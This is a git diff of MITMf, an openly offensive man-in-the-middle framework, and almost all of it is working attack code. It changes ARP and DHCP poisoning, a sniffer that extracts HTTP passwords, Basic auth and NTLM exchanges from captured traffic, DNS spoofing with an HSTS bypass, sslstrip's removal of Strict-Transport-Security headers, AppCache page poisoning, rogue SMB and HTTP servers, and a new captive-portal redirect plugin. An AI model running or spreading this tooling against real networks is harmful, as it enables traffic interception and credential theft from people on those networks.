searched = get_http_searches(http_url_req, body, host) searched = get_http_searches(http_url_req, body, host)
if searched: if searched:
printer(src_ip_port, dst_ip_port, searched) printer(src_ip_port, dst_ip_port, searched)
#We dont need this cause its being taking care of by the proxy # Print user/pwds
if body != '':
#Print user/pwds user_passwd = get_login_pass(body)
#if body != '': if user_passwd != None:
# user_passwd = get_login_pass(body) try:
# if user_passwd != None: http_user = user_passwd[0].decode('utf8')
# try: http_pass = user_passwd[1].decode('utf8')
# http_user = user_passwd[0].decode('utf8') # Set a limit on how long they can be prevent false+
# http_pass = user_passwd[1].decode('utf8') if len(http_user) > 75 or len(http_pass) > 75:
# # Set a limit on how long they can be prevent false+ return
# if len(http_user) > 75 or len(http_pass) > 75: user_msg = 'HTTP username: %s' % http_user
# return printer(src_ip_port, dst_ip_port, user_msg)
# user_msg = 'HTTP username: %s' % http_user pass_msg = 'HTTP password: %s' % http_pass
# printer(src_ip_port, dst_ip_port, user_msg) printer(src_ip_port, dst_ip_port, pass_msg)
# pass_msg = 'HTTP password: %s' % http_pass except UnicodeDecodeError:
# printer(src_ip_port, dst_ip_port, pass_msg) pass
# except UnicodeDecodeError:
# pass
# Print POST loads # Print POST loads
# ocsp is a common SSL post load that's never interesting # ocsp is a common SSL post load that's never interesting
#if method == 'POST' and 'ocsp.' not in host: if method == 'POST' and 'ocsp.' not in host:
# try: try:
# msg = 'POST load: %s' % body.encode('utf8') if verbose == False and len(body) > 99:
# printer(src_ip_port, None, msg) # If it can't decode to utf8 we're probably not interested in it
# except UnicodeDecodeError: msg = 'POST load: %s...' % body[:99].encode('utf8')
# pass else:
msg = 'POST load: %s' % body.encode('utf8')
printer(src_ip_port, None, msg)
except UnicodeDecodeError:
pass
# Kerberos over TCP # Kerberos over TCP
decoded = Decode_Ip_Packet(str(pkt)[14:]) decoded = Decode_Ip_Packet(str(pkt)[14:])
@ -662,7 +674,10 @@ def parse_basic_auth(src_ip_port, dst_ip_port, headers, authorization_header):
b64_auth_re = re.match('basic (.+)', header_val, re.IGNORECASE) b64_auth_re = re.match('basic (.+)', header_val, re.IGNORECASE)
if b64_auth_re != None: if b64_auth_re != None:
basic_auth_b64 = b64_auth_re.group(1) basic_auth_b64 = b64_auth_re.group(1)
try:
basic_auth_creds = base64.decodestring(basic_auth_b64) basic_auth_creds = base64.decodestring(basic_auth_b64)
except Exception:
return
msg = 'Basic Authentication: %s' % basic_auth_creds msg = 'Basic Authentication: %s' % basic_auth_creds
printer(src_ip_port, dst_ip_port, msg) printer(src_ip_port, dst_ip_port, msg)
@ -713,15 +728,13 @@ def headers_to_dict(header_lines):
Convert the list of header lines into a dictionary Convert the list of header lines into a dictionary
''' '''
headers = {} headers = {}
# Incomprehensible list comprehension flattens list of headers for line in header_lines:
# that are each split at ': ' lineList=line.split(': ', 1)
# http://stackoverflow.com/a/406296 key=lineList[0].lower()
headers_list = [x for line in header_lines for x in line.split(': ', 1)] if len(lineList)>1:
headers_dict = dict(zip(headers_list[0::2], headers_list[1::2])) headers[key]=lineList[1]
# Make the header key (like "Content-Length") lowercase else:
for header in headers_dict: headers[key]=""
headers[header.lower()] = headers_dict[header]
return headers return headers
def parse_http_line(http_line, http_methods): def parse_http_line(http_line, http_methods):
@ -794,9 +807,12 @@ def parse_netntlm_chal(headers, chal_header, ack):
header_val2 = header_val2.split(' ', 1) header_val2 = header_val2.split(' ', 1)
# The header value can either start with NTLM or Negotiate # The header value can either start with NTLM or Negotiate
if header_val2[0] == 'NTLM' or header_val2[0] == 'Negotiate': if header_val2[0] == 'NTLM' or header_val2[0] == 'Negotiate':
try:
msg2 = header_val2[1] msg2 = header_val2[1]
except IndexError:
return
msg2 = base64.decodestring(msg2) msg2 = base64.decodestring(msg2)
parse_ntlm_chal(ack, msg2) parse_ntlm_chal(msg2, ack)
def parse_ntlm_chal(msg2, ack): def parse_ntlm_chal(msg2, ack):
''' '''
@ -885,10 +901,10 @@ def get_login_pass(body):
'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname', 'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname',
'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename', 'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename',
'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username', 'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username',
'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in'] 'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in', 'usuario']
passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword', passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword',
'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password' 'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password'
'passwort', 'passwrd', 'wppassword', 'upasswd'] 'passwort', 'passwrd', 'wppassword', 'upasswd','senha','contrasena']
for login in userfields: for login in userfields:
login_re = re.search('(%s=[^&]+)' % login, body, re.IGNORECASE) login_re = re.search('(%s=[^&]+)' % login, body, re.IGNORECASE)

View file

@ -1,5 +1,3 @@
import threading
from core.utils import set_ip_forwarding, iptables from core.utils import set_ip_forwarding, iptables
from core.logger import logger from core.logger import logger
from scapy.all import * from scapy.all import *
@ -19,21 +17,20 @@ class PacketFilter:
iptables().NFQUEUE() iptables().NFQUEUE()
self.nfqueue = NetfilterQueue() self.nfqueue = NetfilterQueue()
self.nfqueue.bind(1, self.modify) self.nfqueue.bind(0, self.modify)
t = threading.Thread(name='packetparser', target=self.nfqueue.run) self.nfqueue.run()
t.setDaemon(True)
t.start()
def modify(self, pkt): def modify(self, pkt):
#log.debug("Got packet") #log.debug("Got packet")
data = pkt.get_payload() data = pkt.get_payload()
packet = IP(data) packet = IP(data)
for filter in self.filter:
try: try:
execfile(self.filter) execfile(filter)
except Exception: except Exception:
log.debug("Error occurred in filter") log.debug("Error occurred in filter", filter)
print_exc() print_exc()
pkt.set_payload(str(packet)) #set the packet content to our modified version pkt.set_payload(str(packet)) #set the packet content to our modified version

View file

@ -214,8 +214,8 @@ class ARPpoisoner:
if targetmac is not None: if targetmac is not None:
try: try:
#log.debug("Poisoning {} <-> {}".format(targetip, self.gatewayip)) #log.debug("Poisoning {} <-> {}".format(targetip, self.gatewayip))
self.s.send(ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op=arpmode)) self.s2.send(Ether(src=self.mymac, dst=targetmac)/ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op=arpmode))
self.s.send(ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op=arpmode)) self.s2.send(Ether(src=self.mymac, dst=self.gatewaymac)/ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op=arpmode))
except Exception as e: except Exception as e:
if "Interrupted system call" not in e: if "Interrupted system call" not in e:
log.error("Exception occurred while poisoning {}: {}".format(targetip, e)) log.error("Exception occurred while poisoning {}: {}".format(targetip, e))
@ -242,8 +242,8 @@ class ARPpoisoner:
log.info("Restoring connection {} <-> {} with {} packets per host".format(targetip, self.gatewayip, count)) log.info("Restoring connection {} <-> {} with {} packets per host".format(targetip, self.gatewayip, count))
try: try:
for i in range(0, count): for i in range(0, count):
self.s.send(ARP(op="is-at", pdst=self.gatewayip, psrc=targetip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=targetmac)) self.s2.send(Ether(src=targetmac, dst='ff:ff:ff:ff:ff:ff')/ARP(op="is-at", pdst=self.gatewayip, psrc=targetip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=targetmac))
self.s.send(ARP(op="is-at", pdst=targetip, psrc=self.gatewayip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gatewaymac)) self.s2.send(Ether(src=self.gatewaymac, dst='ff:ff:ff:ff:ff:ff')/ARP(op="is-at", pdst=targetip, psrc=self.gatewayip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gatewaymac))
except Exception as e: except Exception as e:
if "Interrupted system call" not in e: if "Interrupted system call" not in e:
log.error("Exception occurred while poisoning {}: {}".format(targetip, e)) log.error("Exception occurred while poisoning {}: {}".format(targetip, e))

View file

@ -79,7 +79,7 @@ class DHCPpoisoner():
return 'stored', client_ip return 'stored', client_ip
net = IPNetwork(self.ip_address + '/24') net = IPNetwork(self.ip_address + '/24')
return 'generated', random.choice(list(net)) return 'generated', str(random.choice(list(net)))
def dhcp_callback(self, resp): def dhcp_callback(self, resp):
if resp.haslayer(DHCP): if resp.haslayer(DHCP):

View file

@ -82,7 +82,10 @@ class ProxyPlugins:
self.plugin_list.remove(p) self.plugin_list.remove(p)
log.debug("Removing {} plugin".format(p.name)) log.debug("Removing {} plugin".format(p.name))
for mthd,pmthd in self.mthdDict.iteritems(): for mthd,pmthd in self.mthdDict.iteritems():
self.plugin_mthds[mthd].remove(p) try:
self.plugin_mthds[mthd].remove(getattr(p,pmthd))
except KeyError:
pass #nothing to remove
def hook(self): def hook(self):
'''Magic to hook various function calls in sslstrip''' '''Magic to hook various function calls in sslstrip'''
@ -108,6 +111,7 @@ class ProxyPlugins:
log.debug("hooking {}()".format(fname)) log.debug("hooking {}()".format(fname))
#calls any plugin that has this hook #calls any plugin that has this hook
try: try:
if self.plugin_mthds:
for f in self.plugin_mthds[fname]: for f in self.plugin_mthds[fname]:
a = f(**args) a = f(**args)
if a != None: args = a if a != None: args = a

View file

@ -48,6 +48,12 @@ from IPy import IP
formatter = logging.Formatter("%(asctime)s %(clientip)s [DNS] %(message)s", datefmt="%Y-%m-%d %H:%M:%S") formatter = logging.Formatter("%(asctime)s %(clientip)s [DNS] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("DNSChef", formatter) log = logger().setup_logger("DNSChef", formatter)
dnslog = logging.getLogger('dnslog')
handler = logging.FileHandler('./logs/dns/dns.log',)
handler.setFormatter(formatter)
dnslog.addHandler(handler)
dnslog.setLevel(logging.INFO)
# DNSHandler Mixin. The class contains generic functions to parse DNS requests and # DNSHandler Mixin. The class contains generic functions to parse DNS requests and
# calculate an appropriate response based on user parameters. # calculate an appropriate response based on user parameters.
class DNSHandler(): class DNSHandler():
@ -69,6 +75,7 @@ class DNSHandler():
except Exception as e: except Exception as e:
log.info("Error: invalid DNS request", extra=clientip) log.info("Error: invalid DNS request", extra=clientip)
dnslog.info("Error: invalid DNS request", extra=clientip)
else: else:
# Only Process DNS Queries # Only Process DNS Queries
@ -113,6 +120,7 @@ class DNSHandler():
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q) response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)
log.info("Cooking the response of type '{}' for {} to {}".format(qtype, qname, fake_record), extra=clientip) log.info("Cooking the response of type '{}' for {} to {}".format(qtype, qname, fake_record), extra=clientip)
dnslog.info("Cooking the response of type '{}' for {} to {}".format(qtype, qname, fake_record), extra=clientip)
# IPv6 needs additional work before inclusion: # IPv6 needs additional work before inclusion:
if qtype == "AAAA": if qtype == "AAAA":
@ -182,6 +190,7 @@ class DNSHandler():
elif qtype == "*" and not None in fake_records.values(): elif qtype == "*" and not None in fake_records.values():
log.info("Cooking the response of type '{}' for {} with {}".format("ANY", qname, "all known fake records."), extra=clientip) log.info("Cooking the response of type '{}' for {} with {}".format("ANY", qname, "all known fake records."), extra=clientip)
dnslog.info("Cooking the response of type '{}' for {} with {}".format("ANY", qname, "all known fake records."), extra=clientip)
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap,qr=1, aa=1, ra=1), q=d.q) response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap,qr=1, aa=1, ra=1), q=d.q)
@ -257,6 +266,7 @@ class DNSHandler():
# Proxy the request # Proxy the request
else: else:
log.debug("Proxying the response of type '{}' for {}".format(qtype, qname), extra=clientip) log.debug("Proxying the response of type '{}' for {}".format(qtype, qname), extra=clientip)
dnslog.info("Proxying the response of type '{}' for {}".format(qtype, qname), extra=clientip)
nameserver_tuple = random.choice(nameservers).split('#') nameserver_tuple = random.choice(nameservers).split('#')
response = self.proxyrequest(data, *nameserver_tuple) response = self.proxyrequest(data, *nameserver_tuple)
@ -339,6 +349,7 @@ class DNSHandler():
except Exception as e: except Exception as e:
log.warning("Could not proxy request: {}".format(e), extra=clientip) log.warning("Could not proxy request: {}".format(e), extra=clientip)
dnslog.info("Could not proxy request: {}".format(e), extra=clientip)
else: else:
return reply return reply
@ -346,6 +357,7 @@ class DNSHandler():
clientip = {'clientip': self.client_address[0]} clientip = {'clientip': self.client_address[0]}
log.info("Resolving '{}' to '{}' for HSTS bypass".format(fake_domain, real_domain), extra=clientip) log.info("Resolving '{}' to '{}' for HSTS bypass".format(fake_domain, real_domain), extra=clientip)
dnslog.info("Resolving '{}' to '{}' for HSTS bypass".format(fake_domain, real_domain), extra=clientip)
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q) response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)
@ -354,6 +366,7 @@ class DNSHandler():
#First proxy the request with the real domain #First proxy the request with the real domain
q = DNSRecord.question(real_domain).pack() q = DNSRecord.question(real_domain).pack()
r = self.proxyrequest(q, *nameserver_tuple) r = self.proxyrequest(q, *nameserver_tuple)
if r is None: return None
#Parse the answer #Parse the answer
dns_rr = DNSRecord.parse(r).rr dns_rr = DNSRecord.parse(r).rr
@ -449,7 +462,12 @@ class DNSChef(ConfigWatcher):
# Use alternative DNS servers # Use alternative DNS servers
if config['nameservers']: if config['nameservers']:
self.nameservers = config['nameservers'].split(',') self.nameservers = []
if type(config['nameservers']) is str:
self.nameservers.append(config['nameservers'])
elif type(config['nameservers']) is list:
self.nameservers = config['nameservers']
for section in config.sections: for section in config.sections:

View file

@ -49,10 +49,10 @@ class HTTP:
def start(self): def start(self):
try: try:
if OsInterfaceIsSupported(): #if OsInterfaceIsSupported():
server = ThreadingTCPServer((settings.Config.Bind_To, 80), HTTP1) #server = ThreadingTCPServer((settings.Config.Bind_To, 80), HTTP1)
else: #else:
server = ThreadingTCPServer(('', 80), HTTP1) server = ThreadingTCPServer(('0.0.0.0', 80), HTTP1)
t = threading.Thread(name='HTTP', target=server.serve_forever) t = threading.Thread(name='HTTP', target=server.serve_forever)
t.setDaemon(True) t.setDaemon(True)
@ -267,7 +267,7 @@ def PacketSequence(data, client):
else: else:
Response = IIS_Auth_401_Ans() Response = IIS_Auth_401_Ans()
if settings.Config.Verbose: if settings.Config.Verbose:
log.info("{} [HTTP] Sending NTLM authentication request to".format(client)) log.info("{} [HTTP] Sending NTLM authentication request".format(client))
return str(Response) return str(Response)

View file

@ -28,12 +28,12 @@ class SMB:
def start(self): def start(self):
try: try:
if OsInterfaceIsSupported(): #if OsInterfaceIsSupported():
server1 = ThreadingTCPServer((settings.Config.Bind_To, 445), SMB1) # server1 = ThreadingTCPServer((settings.Config.Bind_To, 445), SMB1)
server2 = ThreadingTCPServer((settings.Config.Bind_To, 139), SMB1) # server2 = ThreadingTCPServer((settings.Config.Bind_To, 139), SMB1)
else: #else:
server1 = ThreadingTCPServer(('', 445), SMB1) server1 = ThreadingTCPServer(('0.0.0.0', 445), SMB1)
server2 = ThreadingTCPServer(('', 139), SMB1) server2 = ThreadingTCPServer(('0.0.0.0', 139), SMB1)
for server in [server1, server2]: for server in [server1, server2]:
t = threading.Thread(name='SMB', target=server.serve_forever) t = threading.Thread(name='SMB', target=server.serve_forever)

View file

@ -155,7 +155,7 @@ class ServerConnection(HTTPClient):
self.isCompressed = True self.isCompressed = True
elif (key.lower()== 'strict-transport-security'): elif (key.lower()== 'strict-transport-security'):
clientlog.info("Zapped a strict-trasport-security header", extra=self.clientInfo) clientlog.info("Zapped a strict-transport-security header", extra=self.clientInfo)
elif (key.lower() == 'content-length'): elif (key.lower() == 'content-length'):
self.contentLength = value self.contentLength = value
@ -179,7 +179,7 @@ class ServerConnection(HTTPClient):
self.plugins.hook() self.plugins.hook()
if logging.getLevelName(log.getEffectiveLevel()) == "DEBUG": if logging.getLevelName(log.getEffectiveLevel()) == "DEBUG":
for header, value in self.client.headers.iteritems(): for header, value in self.headers.iteritems():
log.debug("Receiving header: ({}: {})".format(header, value)) log.debug("Receiving header: ({}: {})".format(header, value))
def handleResponsePart(self, data): def handleResponsePart(self, data):

View file

@ -98,5 +98,5 @@ class iptables:
def NFQUEUE(self): def NFQUEUE(self):
log.debug("Setting iptables NFQUEUE rule") log.debug("Setting iptables NFQUEUE rule")
os.system('iptables -t nat -A PREROUTING -j NFQUEUE --queue-num 1') os.system('iptables -I FORWARD -j NFQUEUE --queue-num 0')
self.nfqueue = True self.nfqueue = True

@ -1 +1 @@
Subproject commit dadf1d21bfcb9c8ebefc7891bd95b9452b2af8d5 Subproject commit d2f352139f23ed642fa174211eddefb95e6a8586

2
logs/.gitignore vendored
View file

@ -1,5 +1,5 @@
* *
!.gitignore !.gitignore
!responder/ !responder/
!dnschef/ !dns/
!ferret-ng/ !ferret-ng/

130
mitmf.py
View file

@ -41,7 +41,7 @@ mitmf_version = '0.9.8'
mitmf_codename = 'The Dark Side' mitmf_codename = 'The Dark Side'
if os.geteuid() != 0: if os.geteuid() != 0:
sys.exit("[-] The derp is strong with this one") sys.exit("[-] The derp is strong with this one\nTIP: you may run MITMf as root.")
parser = argparse.ArgumentParser(description="MITMf v{} - '{}'".format(mitmf_version, mitmf_codename), parser = argparse.ArgumentParser(description="MITMf v{} - '{}'".format(mitmf_version, mitmf_codename),
version="{} - '{}'".format(mitmf_version, mitmf_codename), version="{} - '{}'".format(mitmf_version, mitmf_codename),
@ -52,14 +52,14 @@ parser = argparse.ArgumentParser(description="MITMf v{} - '{}'".format(mitmf_ver
#add MITMf options #add MITMf options
sgroup = parser.add_argument_group("MITMf", "Options for MITMf") sgroup = parser.add_argument_group("MITMf", "Options for MITMf")
sgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]") sgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]")
sgroup.add_argument("-i", dest='interface', type=str, help="Interface to listen on") sgroup.add_argument("-i", dest='interface', required=True, type=str, help="Interface to listen on")
sgroup.add_argument("-c", dest='configfile', metavar="CONFIG_FILE", type=str, default="./config/mitmf.conf", help="Specify config file to use") sgroup.add_argument("-c", dest='configfile', metavar="CONFIG_FILE", type=str, default="./config/mitmf.conf", help="Specify config file to use")
sgroup.add_argument("-p", "--preserve-cache", action="store_true", help="Don't kill client/server caching") sgroup.add_argument("-p", "--preserve-cache", action="store_true", help="Don't kill client/server caching")
sgroup.add_argument("-r", '--read-pcap', type=str, help='Parse specified pcap for credentials and exit') sgroup.add_argument("-r", '--read-pcap', type=str, help='Parse specified pcap for credentials and exit')
sgroup.add_argument("-l", dest='listen_port', type=int, metavar="PORT", default=10000, help="Port to listen on (default 10000)") sgroup.add_argument("-l", dest='listen_port', type=int, metavar="PORT", default=10000, help="Port to listen on (default 10000)")
sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.") sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.") sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
sgroup.add_argument("-F", "--filter", type=str, help='Filter to apply to incoming traffic') sgroup.add_argument("-F", "--filter", type=str, help='Filter to apply to incoming traffic', nargs='+')
#Initialize plugins and pass them the parser NameSpace object #Initialize plugins and pass them the parser NameSpace object
plugins = [plugin(parser) for plugin in plugin.Plugin.__subclasses__()] plugins = [plugin(parser) for plugin in plugin.Plugin.__subclasses__()]
@ -73,6 +73,15 @@ options = parser.parse_args()
#Set the log level #Set the log level
logger().log_level = logging.__dict__[options.log_level.upper()] logger().log_level = logging.__dict__[options.log_level.upper()]
from core.logger import logger
formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("MITMf", formatter)
from core.netcreds import NetCreds
if options.read_pcap:
NetCreds().parse_pcap(options.read_pcap)
#Check to see if we supplied a valid interface, pass the IP and MAC to the NameSpace object #Check to see if we supplied a valid interface, pass the IP and MAC to the NameSpace object
from core.utils import get_ip, get_mac, shutdown from core.utils import get_ip, get_mac, shutdown
options.ip = get_ip(options.interface) options.ip = get_ip(options.interface)
@ -80,33 +89,18 @@ options.mac = get_mac(options.interface)
settings.Config.populate(options) settings.Config.populate(options)
from core.logger import logger
formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("MITMf", formatter)
log.debug("MITMf started: {}".format(sys.argv)) log.debug("MITMf started: {}".format(sys.argv))
#Start Net-Creds #Start Net-Creds
from core.netcreds import NetCreds print "[*] MITMf v{} - '{}'".format(mitmf_version, mitmf_codename)
NetCreds().start(options.interface, options.ip, options.read_pcap)
NetCreds().start(options.interface, options.ip)
print "|"
print "|_ Net-Creds v{} online".format(NetCreds.version)
from core.sslstrip.CookieCleaner import CookieCleaner
from core.proxyplugins import ProxyPlugins from core.proxyplugins import ProxyPlugins
from core.sslstrip.StrippingProxy import StrippingProxy
from core.sslstrip.URLMonitor import URLMonitor
URLMonitor.getInstance().setFaviconSpoofing(options.favicon)
URLMonitor.getInstance().setCaching(options.preserve_cache)
CookieCleaner.getInstance().setEnabled(options.killsessions)
strippingFactory = http.HTTPFactory(timeout=10)
strippingFactory.protocol = StrippingProxy
reactor.listenTCP(options.listen_port, strippingFactory)
ProxyPlugins().all_plugins = plugins ProxyPlugins().all_plugins = plugins
print "[*] MITMf v{} - '{}'".format(mitmf_version, mitmf_codename)
for plugin in plugins: for plugin in plugins:
#load only the plugins that have been called at the command line #load only the plugins that have been called at the command line
@ -126,48 +120,64 @@ for plugin in plugins:
for line in xrange(0, len(plugin.tree_info)): for line in xrange(0, len(plugin.tree_info)):
print "| |_ {}".format(plugin.tree_info.pop()) print "| |_ {}".format(plugin.tree_info.pop())
plugin.reactor(strippingFactory)
plugin.start_config_watch() plugin.start_config_watch()
print "|"
print "|_ Sergio-Proxy v0.2.1 online"
print "|_ SSLstrip v0.9 by Moxie Marlinspike online"
print "|"
if options.filter: if options.filter:
from core.packetfilter import PacketFilter from core.packetfilter import PacketFilter
pfilter = PacketFilter(options.filter) pfilter = PacketFilter(options.filter)
pfilter.start()
print "|_ PacketFilter online" print "|_ PacketFilter online"
print "| |_ Applying filter {} to incoming packets".format(options.filter) for filter in options.filter:
print " |_ Applying filter {} to incoming packets".format(filter)
print "|_ Net-Creds v{} online".format(NetCreds.version) try:
pfilter.start()
#Start mitmf-api except KeyboardInterrupt:
from core.mitmfapi import mitmfapi
print "|_ MITMf-API online"
mitmfapi().start()
#Start the HTTP Server
from core.servers.HTTP import HTTP
HTTP().start()
print "|_ HTTP server online"
#Start DNSChef
from core.servers.DNS import DNSChef
DNSChef().start()
print "|_ DNSChef v{} online".format(DNSChef.version)
#Start the SMB server
from core.servers.SMB import SMB
SMB().start()
print "|_ SMB server online\n"
#start the reactor
reactor.run()
print "\n"
if options.filter:
pfilter.stop() pfilter.stop()
shutdown()
shutdown() else:
from core.sslstrip.CookieCleaner import CookieCleaner
from core.sslstrip.StrippingProxy import StrippingProxy
from core.sslstrip.URLMonitor import URLMonitor
URLMonitor.getInstance().setFaviconSpoofing(options.favicon)
URLMonitor.getInstance().setCaching(options.preserve_cache)
CookieCleaner.getInstance().setEnabled(options.killsessions)
strippingFactory = http.HTTPFactory(timeout=10)
strippingFactory.protocol = StrippingProxy
reactor.listenTCP(options.listen_port, strippingFactory)
for plugin in plugins:
if vars(options)[plugin.optname] is True:
plugin.reactor(strippingFactory)
print "|_ Sergio-Proxy v0.2.1 online"
print "|_ SSLstrip v0.9 by Moxie Marlinspike online"
#Start mitmf-api
from core.mitmfapi import mitmfapi
print "|"
print "|_ MITMf-API online"
mitmfapi().start()
#Start the HTTP Server
from core.servers.HTTP import HTTP
HTTP().start()
print "|_ HTTP server online"
#Start DNSChef
from core.servers.DNS import DNSChef
DNSChef().start()
print "|_ DNSChef v{} online".format(DNSChef.version)
#Start the SMB server
from core.servers.SMB import SMB
SMB().start()
print "|_ SMB server online\n"
#start the reactor
reactor.run()
print "\n"
shutdown()

View file

@ -36,6 +36,7 @@ class AppCachePlugin(Plugin):
from core.sslstrip.URLMonitor import URLMonitor from core.sslstrip.URLMonitor import URLMonitor
self.urlMonitor = URLMonitor.getInstance() self.urlMonitor = URLMonitor.getInstance()
self.urlMonitor.caching = True
self.urlMonitor.setAppCachePoisoning() self.urlMonitor.setAppCachePoisoning()
def response(self, response, request, data): def response(self, response, request, data):
@ -72,29 +73,25 @@ class AppCachePlugin(Plugin):
p = self.getTemplatePrefix(section) p = self.getTemplatePrefix(section)
self.clientlog.info("Poisoning raw URL", extra=request.clientInfo) self.clientlog.info("Poisoning raw URL", extra=request.clientInfo)
if os.path.exists(p + '.replace'): # replace whole content if os.path.exists(p + '.replace'): # replace whole content
f = open(p + '.replace', 'r') with open(p + '.replace', 'r') as f:
data = f.read() data = f.read()
f.close()
elif os.path.exists(p + '.append'): # append file to body elif os.path.exists(p + '.append'): # append file to body
f = open(p + '.append', 'r') with open(p + '.append', 'r') as f:
data += f.read() data += f.read()
f.close()
elif (section.get('tamper_url',False) == url) or (section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url)): elif (section.get('tamper_url',False) == url) or (section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url)):
self.clientlog.info("Found URL in section '{}'!".format(name), extra=request.clientInfo) self.clientlog.info("Found URL in section '{}'!".format(name), extra=request.clientInfo)
p = self.getTemplatePrefix(section) p = self.getTemplatePrefix(section)
self.clientlog.info("Poisoning URL with tamper template: {}".format(p), extra=request.clientInfo) self.clientlog.info("Poisoning URL with tamper template: {}".format(p), extra=request.clientInfo)
if os.path.exists(p + '.replace'): # replace whole content if os.path.exists(p + '.replace'): # replace whole content
f = open(p + '.replace', 'r') with open(p + '.replace', 'r') as f:
data = f.read() data = f.read()
f.close()
elif os.path.exists(p + '.append'): # append file to body elif os.path.exists(p + '.append'): # append file to body
f = open(p + '.append', 'r') with open(p + '.append', 'r') as f:
appendix = f.read() appendix = f.read()
data = re.sub(re.compile("</body>",re.IGNORECASE), appendix + "</body>", data) #append to body data = re.sub(re.compile("</body>", re.IGNORECASE), appendix + "</body>", data) #append to body
f.close()
# add manifest reference # add manifest reference
data = re.sub(re.compile("<html",re.IGNORECASE),"<html manifest=\"" + self.getManifestUrl(section)+"\"", data) data = re.sub(re.compile("<html",re.IGNORECASE),"<html manifest=\"" + self.getManifestUrl(section)+"\"", data)
@ -154,9 +151,8 @@ class AppCachePlugin(Plugin):
if not os.path.exists(p+'.manifest'): if not os.path.exists(p+'.manifest'):
p = self.getDefaultTemplatePrefix() p = self.getDefaultTemplatePrefix()
f = open(p + '.manifest', 'r') with open(p + '.manifest', 'r') as f:
manifest = f.read() manifest = f.read()
f.close()
return self.decorate(manifest, section) return self.decorate(manifest, section)
def decorate(self, content, section): def decorate(self, content, section):

149
plugins/captive.py Executable file
View file

@ -0,0 +1,149 @@
# Copyright (c) 2014-2016 Oliver Nettinger, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
# note: portal.html has been adapted from
# config/responder/AccessDenied.html for now
from plugins.plugin import Plugin
from urlparse import urlparse
class Captive(Plugin):
name = "Captive Portal"
optname = "captive"
tree_info = ["Captive Portal online"]
desc = "Be a captive portal!"
version = "0.1"
def initialize(self, options):
self.options = options
from core.utils import shutdown
if options.portalurl:
self.portalurl = options.portalurl
else:
# self.options.ip is prefilled earlier
self.hostname = 'captive.portal' if self.options.usedns else self.options.ip
if options.portaldir:
self.serve_dir(options.portaldir)
else:
self.serve_portal()
def response(self, response, request, data):
if urlparse(self.portalurl).hostname not in request.headers['host']:
self.clientlog.info("Redirecting to captive portal {}".format(self.portalurl), extra=request.clientInfo)
response.headers = {}
data = '''<html>
<body>
<p>Please click <a href="{}">here</a> if you are not redirected automatically</p>
</body></html>
'''.format(self.portalurl)
response.redirect(self.portalurl)
return {'response': response, 'request':request, 'data': data}
def options(self, options):
''' captive can be either run redirecting to a specified url (--portalurl), serve the payload locally (no argument) or
start an instance of SimpleHTTPServer to serve the LOCALDIR (--portaldir) '''
group = options.add_mutually_exclusive_group(required=False)
group.add_argument('--portalurl', dest='portalurl', metavar="URL", help='Specify the URL where the portal is located, e.g. http://example.com.')
group.add_argument('--portaldir', dest='portaldir', metavar="LOCALDIR", help='Specify a local path containg the portal files served with a SimpleHTTPServer on a different port (see config).')
